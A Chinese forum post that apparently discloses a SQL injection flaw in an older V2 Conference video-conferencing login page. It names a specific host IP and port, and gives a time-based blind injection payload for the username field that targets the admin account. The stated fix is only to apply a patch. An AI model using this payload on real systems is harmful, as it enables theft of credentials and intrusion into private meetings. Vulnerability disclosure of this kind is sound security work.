Moke|墨客

 找回密码
 立即注册
搜索
查看: 9181|回复: 0

绿盟视频会议系统SQL注入

[复制链接]

3636

主题

0

回帖

3681

积分

超级版主

Rank: 8Rank: 8

积分
3681
发表于 2016-5-12 17:54:24 | 显示全部楼层 |阅读模式






                   通过注入能够拿到管理账户密码,然后登录后台查看会议密码,通过会议密码能够进入到远程会议中,恶意攻击者能够窃取某些敏感信息。
  http://211.151.49.196:18080/V2Conf/jsp/user/loginAction.do
  其实是V2 Conference视频会议系统较低版本的SQL注入,注入发生在登录时用户名的输入框内,使用以下注入语句可测试:
  1' or (select benchmark(300000,md5(user())) from users where  substring(username,1,5)='admin')#
  修复方案:
  升级补丁
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

 

 

快速回复 返回顶部 返回列表